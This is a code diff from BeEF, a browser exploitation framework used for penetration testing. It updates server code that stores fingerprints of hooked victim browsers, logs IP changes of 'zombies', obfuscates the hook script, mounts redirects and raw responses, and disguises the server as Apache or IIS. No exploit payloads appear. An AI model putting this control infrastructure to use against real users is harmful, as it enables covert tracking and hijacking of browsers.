if BeEF::Filters.is_valid_yes_no?(java_enabled)
BD.set(session_id, 'JavaEnabled', java_enabled)
else
self.err_msg "Invalid value for JavaEnabled returned from the hook browser's initial connection."
end
# get and store the yes|no value for VBScriptEnabled
vbscript_enabled = get_param(@data['results'], 'VBScriptEnabled')
if BeEF::Filters.is_valid_yes_no?(vbscript_enabled)
@@ -239,6 +282,14 @@ module BeEF
self.err_msg "Invalid value for HasGoogleGears returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasFoxit
has_foxit = get_param(@data['results'], 'HasFoxit')
if BeEF::Filters.is_valid_yes_no?(has_foxit)
BD.set(session_id, 'HasFoxit', has_foxit)
else
self.err_msg "Invalid value for HasFoxit returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasWebSocket
has_web_socket = get_param(@data['results'], 'HasWebSocket')
if BeEF::Filters.is_valid_yes_no?(has_web_socket)
@@ -247,6 +298,14 @@ module BeEF
self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasWebRTC
has_webrtc = get_param(@data['results'], 'HasWebRTC')
if BeEF::Filters.is_valid_yes_no?(has_webrtc)
BD.set(session_id, 'HasWebRTC', has_webrtc)
else
self.err_msg "Invalid value for HasWebRTC returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasActiveX
has_activex = get_param(@data['results'], 'HasActiveX')
if BeEF::Filters.is_valid_yes_no?(has_activex)
@@ -255,6 +314,54 @@ module BeEF
self.err_msg "Invalid value for HasActiveX returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasSilverlight
has_silverlight = get_param(@data['results'], 'HasSilverlight')
if BeEF::Filters.is_valid_yes_no?(has_silverlight)
BD.set(session_id, 'HasSilverlight', has_silverlight)
else
self.err_msg "Invalid value for HasSilverlight returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasQuickTime
has_quicktime = get_param(@data['results'], 'HasQuickTime')
if BeEF::Filters.is_valid_yes_no?(has_quicktime)
BD.set(session_id, 'HasQuickTime', has_quicktime)
else
self.err_msg "Invalid value for HasQuickTime returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasRealPlayer
has_realplayer = get_param(@data['results'], 'HasRealPlayer')
if BeEF::Filters.is_valid_yes_no?(has_realplayer)
BD.set(session_id, 'HasRealPlayer', has_realplayer)
else
self.err_msg "Invalid value for HasRealPlayer returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasWMP
has_wmp = get_param(@data['results'], 'HasWMP')
if BeEF::Filters.is_valid_yes_no?(has_wmp)
BD.set(session_id, 'HasWMP', has_wmp)
else
self.err_msg "Invalid value for HasWMP returned from the hook browser's initial connection."
end
# get and store the value for CPU
cpu_type = get_param(@data['results'], 'CPU')
if !cpu_type.nil?
BD.set(session_id, 'CPU', cpu_type)
else
self.err_msg "Invalid value for CPU returned from the hook browser's initial connection."
end
# get and store the value for TouchEnabled
touch_enabled = get_param(@data['results'], 'TouchEnabled')
if BeEF::Filters.is_valid_yes_no?(touch_enabled)
BD.set(session_id, 'TouchEnabled', touch_enabled)
else
self.err_msg "Invalid value for TouchEnabled returned from the hook browser's initial connection."
end
# get and store whether the browser has session cookies enabled
has_session_cookies = get_param(@data['results'], 'hasSessionCookies')
if BeEF::Filters.is_valid_yes_no?(has_session_cookies)

2
core/main/handlers/commands.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

20
core/main/handlers/hookedbrowsers.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -51,13 +51,25 @@ module Handlers
# @note is a known browser so send instructions
else
# @note Check if we haven't seen this browser for a while, log an event if we haven't
if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
end
# @note record the last poll from the browser
hooked_browser.lastseen = Time.new.to_i
# @note Check for a change in zombie IP and log an event
if hooked_browser.ip != request.ip
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
hooked_browser.ip = request.ip
if config.get('beef.http.use_x_forward_for') == true
if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
end
else
if hooked_browser.ip != request.ip
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
hooked_browser.ip = request.ip
end
end
hooked_browser.count!

16
core/main/handlers/modules/beefjs.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -21,7 +21,7 @@ module BeEF
beef_js_path = "#{$root_dir}/core/main/client/"
# @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js)
ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
# @note BeEF libraries: need Eruby evaluation and obfuscation
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
@@ -66,6 +66,12 @@ module BeEF
hook_session_config = BeEF::Core::Server.instance.to_h
# @note if http_host="0.0.0.0" in config ini, use the host requested by client
unless hook_session_config['beef_public'].nil?
if hook_session_config['beef_host'] != hook_session_config['beef_public']
hook_session_config['beef_host'] = hook_session_config['beef_public']
hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_host']}/, hook_session_config['beef_public'])
end
end
if hook_session_config['beef_host'].eql? "0.0.0.0"
hook_session_config['beef_host'] = req_host
hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
@@ -74,6 +80,10 @@ module BeEF
# @note set the XHR-polling timeout
hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
# @note set the hook file path and BeEF's cookie name
hook_session_config['hook_file'] = config.get("beef.http.hook_file")
hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
# @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil?
if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
@@ -99,7 +109,7 @@ module BeEF
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
else
@final_hook = ext_js_to_not_obfuscate + @hook
end

4
core/main/handlers/modules/command.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -52,7 +52,7 @@ module BeEF
if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
#content = command_module.output.gsub('//
#//
#// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
#// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
#// Browser Exploitation Framework (BeEF) - http://beefproject.com
#// See the file 'doc/COPYING' for copying permission
#//

2
core/main/logger.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/migration.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

8
core/main/models/browserdetails.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -80,6 +80,7 @@ module Models
return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
@@ -91,7 +92,6 @@ module Models
return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
end
@@ -103,7 +103,9 @@ module Models
def self.hw_icon(session_id)
ua_string = get(session_id, 'BrowserReportedName')
hardware = get(session_id, 'Hardware')
return BeEF::Core::Constants::Hardware::HW_VM_IMG if hardware =~ /Virtual Machine/
return BeEF::Core::Constants::Hardware::HW_LAPTOP_IMG if hardware =~ /Laptop/
return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR

2
core/main/models/command.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/models/commandmodule.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/models/hookedbrowser.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/models/log.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/models/optioncache.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/models/result.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/models/user.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/network_stack/api.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

34
core/main/network_stack/assethandler.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -24,6 +24,38 @@ module Handlers
@root_dir = File.expand_path('../../../../', __FILE__)
end
# Binds a redirector to a mount point
# @param [String] target The target for the redirector
# @param [String] path An optional URL path to mount the redirector to (can be nil for a random path)
# @return [String] URL Path of the redirector
# @todo This function, similar to bind(), should accept a hooked browser session to limit the mounted file to a certain session etc.
def bind_redirect(target, path=nil)
url = build_url(path,nil)
@allocations[url] = {'target' => target}
@http_server.mount(url,BeEF::Core::NetworkStack::Handlers::Redirector.new(target))
@http_server.remap
print_info "Redirector to [" + target + "] bound to url [" + url + "]"
url
end
# Binds raw HTTP to a mount point
# @param [Integer] status HTTP status code to return
# @param [String] headers HTTP headers as a JSON string to return
# @param [String] body HTTP body to return
# @param [String] path URL path to mount the asset to TODO (can be nil for random path)
# @todo @param [Integer] count The amount of times the asset can be accessed before being automatically unbinded (-1 = unlimited)
def bind_raw(status, header, body, path=nil, count=-1)
url = build_url(path,nil)
@allocations[url] = {}
@http_server.mount(
url,
BeEF::Core::NetworkStack::Handlers::Raw.new(status, header, body)
)
@http_server.remap
print_info "Raw HTTP bound to url [" + url + "]"
url
end
# Binds a file to a mount point
# @param [String] file File path to asset
# @param [String] path URL path to mount the asset to (can be nil for random path)

2
core/main/network_stack/handlers/dynamicreconstruction.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

33
core/main/network_stack/handlers/raw.rb Normal file
View File

@@ -0,0 +1,33 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module NetworkStack
module Handlers
class Raw
def initialize(status, header={}, body)
@status = status
@header = header
@body = body
end
def call(env)
[@status, @header, @body]
end
private
@request
@response
end
end
end
end
end

42
core/main/network_stack/handlers/redirector.rb Normal file
View File

@@ -0,0 +1,42 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module NetworkStack
module Handlers
# @note Redirector is used as a Rack app for mounting HTTP redirectors, instead of content
# @todo Add new options to specify what kind of redirect you want to achieve
class Redirector
@target = ""
def initialize(target)
@target = target
end
def call(env)
@response = Rack::Response.new(
body = ['302 found'],
status = 302,
header = {
'Content-Type' => 'text',
'Location' => @target
}
)
end
private
@request
@response
end
end
end
end
end

2
core/main/network_stack/websocket/websocket.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

9
core/main/rest/api.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -37,12 +37,19 @@ module BeEF
end
end
module RegisterServerHandler
def self.mount_handler(server)
server.mount('/api/server', BeEF::Core::Rest::Server.new)
end
end
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterServerHandler, BeEF::API::Server, 'mount_handler')
#
# Check the source IP is within the permitted subnet

2
core/main/rest/handlers/admin.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/rest/handlers/categories.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

22
core/main/rest/handlers/hookedbrowsers.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -72,15 +72,15 @@ module BeEF
details = BeEF::Core::Models::BrowserDetails
{
'id' => hb.id,
'session' => hb.session,
'name' => details.get(hb.session, 'BrowserName'),
'version' => details.get(hb.session, 'BrowserVersion'),
'os' => details.get(hb.session, 'OsName'),
'platform' => details.get(hb.session, 'SystemPlatform'),
'ip' => hb.ip,
'domain' => details.get(hb.session, 'HostName'),
'port' => hb.port.to_s,
'id' => hb.id,
'session' => hb.session,
'name' => details.get(hb.session, 'BrowserName'),
'version' => details.get(hb.session, 'BrowserVersion'),
'os' => details.get(hb.session, 'OsName'),
'platform' => details.get(hb.session, 'BrowserPlatform'),
'ip' => hb.ip,
'domain' => details.get(hb.session, 'HostName'),
'port' => hb.port.to_s,
'page_uri' => details.get(hb.session, 'PageURI')
}
end
@@ -88,4 +88,4 @@ module BeEF
end
end
end
end
end

2
core/main/rest/handlers/logs.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/rest/handlers/modules.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

41
core/main/rest/handlers/server.rb Normal file
View File

@@ -0,0 +1,41 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Rest
class Server < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
http_server = BeEF::Core::Server.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Binds a local file to a specified path in BeEF's web server
post '/bind' do
request.body.rewind
begin
data = JSON.parse request.body.read
mount = data['mount']
local_file = data['local_file']
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(local_file, mount)
status 200
rescue Exception => e
error 400
end
end
end
end
end
end

2
core/main/router/api.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

29
core/main/router/router.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -81,21 +81,40 @@ module BeEF
case type
when "apache"
headers "Server" => "Apache/2.2.3 (CentOS)",
"Content-Type" => "text/html"
"Content-Type" => "text/html; charset=UTF-8"
when "iis"
headers "Server" => "Microsoft-IIS/6.0",
"X-Powered-By" => "ASP.NET",
"Content-Type" => "text/html"
"Content-Type" => "text/html; charset=UTF-8"
else
print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
end
end
# @note If CORS are enabled, expose the appropriate headers
# this apparently duplicate code is needed to reply to preflight OPTIONS requests, which need to respond with a 200
# and be able to handle requests with a JSON content-type
if request.request_method == 'OPTIONS' && config.get("beef.http.restful_api.allow_cors")
allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
headers "Access-Control-Allow-Origin" => allowed_domains,
"Access-Control-Allow-Methods" => "POST, GET",
"Access-Control-Allow-Headers" => "Content-Type"
halt 200
end
# @note If CORS are enabled, expose the appropriate headers
if config.get("beef.http.restful_api.allow_cors")
allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
headers "Access-Control-Allow-Origin" => allowed_domains,
"Access-Control-Allow-Methods" => "POST, GET"
end
end
# @note Default root page
get "/" do
if config.get("beef.http.web_server_imitation.enable")
bp = config.get "beef.http.web_ui_basepath"
type = config.get("beef.http.web_server_imitation.type")
case type
when "apache"
@@ -191,7 +210,7 @@ module BeEF
"<h2>If you are the website administrator:</h2>" +
"<p>You may now add content to the directory <tt>/var/www/html/</tt>. Note that until you do so, people visiting your website will see this page and not your content. To prevent this page from ever being used, follow the instructions in the file <tt>/etc/httpd/conf.d/welcome.conf</tt>.</p>" +
"<p>You are free to use the images below on Apache and CentOS Linux powered HTTP servers. Thanks for using Apache and CentOS!</p>" +
"<p><a href=\"http://httpd.apache.org/\"><img src=\"/ui/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"/ui/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
"<p><a href=\"http://httpd.apache.org/\"><img src=\"#{bp}/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"#{bp}/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
"</div>" +
"</div>" +
"</div>" +
@@ -216,7 +235,7 @@ module BeEF
"<table>" +
"<tr>" +
"<td ID=tableProps width=70 valign=top align=center>" +
"<img ID=pagerrorImg src=\"/ui/media/images/icons/pagerror.gif\" width=36 height=48>" +
"<img ID=pagerrorImg src=\"#{bp}/media/images/icons/pagerror.gif\" width=36 height=48>" +
"<td ID=tablePropsWidth width=400>" +
"<h1 ID=errortype style=\"font:14pt/16pt verdana; color:#4e4e4e\">" +
"<P ID=Comment1><!--Problem--><P ID=\"errorText\">Under Construction</h1>" +

Some files were not shown because too many files have changed in this diff Show More